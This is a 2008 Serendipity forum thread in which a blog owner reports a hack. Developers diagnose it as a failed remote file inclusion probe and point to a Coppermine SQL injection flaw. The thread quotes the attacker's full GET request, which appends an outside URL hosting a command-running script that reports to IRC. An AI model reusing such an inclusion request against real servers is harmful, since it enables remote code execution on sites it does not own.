Serendipity Forums

User and developer community
https://board.s9y.org/

Possible execution of malicious code

https://board.s9y.org/viewtopic.php?t=12997

Page 1 of 1

Possible execution of malicious code

Posted: Tue May 20, 2008 7:47 pm
by Shaun.Mitchell
My Serendipity blog was hacked today and my hosting provider is saying that it is a bug with Serendipty (don't all hosting providers blame the software and not their server :))

I'm not sure if this is possible but this is what they are saying was run:

GET /blog/index.php?/archives/
24MCTSSQLServer2005.html27kfl209.85.165.104/
cache:uRVO84x_ygMJ:www.verticalevolution.com/blog/index.php3F/
archives/24MCTSSQLServer2005.html=http://www.dreamplay.com.br/PSD/x.txt?

This is the key: http://www.dreamplay.com.br/PSD/x.txt looking at this it's a script that runs commands against the server and sends the results to an IRC channel.

Any thoughts on this from anyone? I'm hoping it's a server issue and not a serendipity issue.

Re: Possible execution of malicious code

Posted: Tue May 20, 2008 8:31 pm
by garvinhicking
Hi!

I tried to reproduce this, but using my own URLs this doesn't really work.

Actually, I don't think there's a place where Serendipity can include remove HTTP url codes as a PHP include command, so I don't see any vulnerability here.

I agree the URL looks like a hack, but to me it does not seem to do anything.

Instead of "http://www.dreamplay.com.br/PSD/x.txt" I created my own file: http://garv.in/test.txt -- if it had worked, on the vulnerable server an "/tmp/evil.txt" file would have been created, which is not the case.

Which serendipity version were you using? Was any other software running on your website, apart from Serendipity? It seems the URL is just a usual attack of remote software that tries to append its URL to see if remote code is executed.

What wonders me is this "MCTSSQLServer2005" stuff. This seems to stem from a hack attack where people tried to exploit the vulnerability in the Microsoft SQL Sserver, which does surely not work with Serendipity. ;)

Regards,
Garvin

Posted: Tue May 20, 2008 8:34 pm
by Shaun.Mitchell
Thanks for the quick reply. I was runngin version 1.2.1 but just finished upgrading. The SQLServer stuff was a blog post of mine with that title. I really didn't think that there was a case of them being able to run executable code in the URL but just wanted to make sure. I have the integration into the coppermine photo gallery on the site as well.

Thanks again.

Posted: Wed May 21, 2008 12:13 pm
by garvinhicking
Hi!

I believe Coppermine exploits have been around the last couple of days. This seems like a good suspect!

Regards,
Garvin

Posted: Wed May 21, 2008 3:57 pm
by judebert
Indeed, on the Coppermine home page they indicate an SQL injection vulnerability only a month old. If you had a version older than 1.4.18, it was vulnerable and needs to be upgraded.
All times are UTC+02:00
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited